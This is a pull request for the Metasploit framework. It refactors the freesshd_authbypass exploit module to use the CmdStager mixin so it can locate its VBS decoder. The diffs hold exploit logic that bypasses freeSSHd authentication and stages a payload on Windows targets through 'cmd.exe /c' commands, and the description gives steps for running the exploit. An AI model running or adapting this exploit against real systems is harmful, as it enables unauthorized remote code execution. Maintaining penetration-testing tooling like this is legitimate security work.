### PR TITLE
Use the Msf::Exploit::CmdStager mixin. Fixes #8092.

### DIFF
--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::EXE
   include Msf::Exploit::CmdStager
 
   def initialize(info={})
@@ -81,24 +80,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 
-  def upload_payload(connection)
-    exe = generate_payload_exe
-    filename = rand_text_alpha(8) + ".exe"
-    cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
-    opts = {
-      :linemax => 1700,
-      :decoder => default_decoder(:vbs)
-    }
-
-    cmds = cmdstager.generate(opts)
-
-    if (cmds.nil? or cmds.length < 1)
-      print_error("The command stager could not be generated")
-      raise ArgumentError
-    end
-    cmds.each { |cmd|
-      connection.exec!("cmd.exe /c "+cmd)
-    }
+  def execute_command(cmd, opts = {})
+    @connection.exec!("cmd.exe /c "+cmd)
   end
 
   def setup_ssh_options
@@ -168,18 +151,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     options = setup_ssh_options
 
-    connection = nil
+    @connection = nil
 
     each_user do |username|
       next if username.empty?
-      connection=do_login(username,options)
-      break if connection
+      @connection=do_login(username,options)
+      break if @connection
     end
 
-    if connection
+    if @connection
       print_status("Uploading payload, this may take several minutes...")
-      upload_payload(connection)
-      handler
+      execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
     end
   end
 

--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager
 
   def initialize(info={})
     super(update_info(info,
@@ -86,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
     opts = {
       :linemax => 1700,
-      :decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64"),
+      :decoder => default_decoder(:vbs)
     }
 
     cmds = cmdstager.generate(opts)


### PR DESCRIPTION
Update the freesshd_authbypass module so it can locate the vbs_b64 command stager.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a session on an exploitable target.
- [x] `use exploit/windows/ssh/freesshd_authbypass`
- [x] Set RHOST, RPORT, USERNAME options accordingly.
- [x] `run`
- [x] **Verify** the exploit runs without throwing an Errno::ENOENT error.

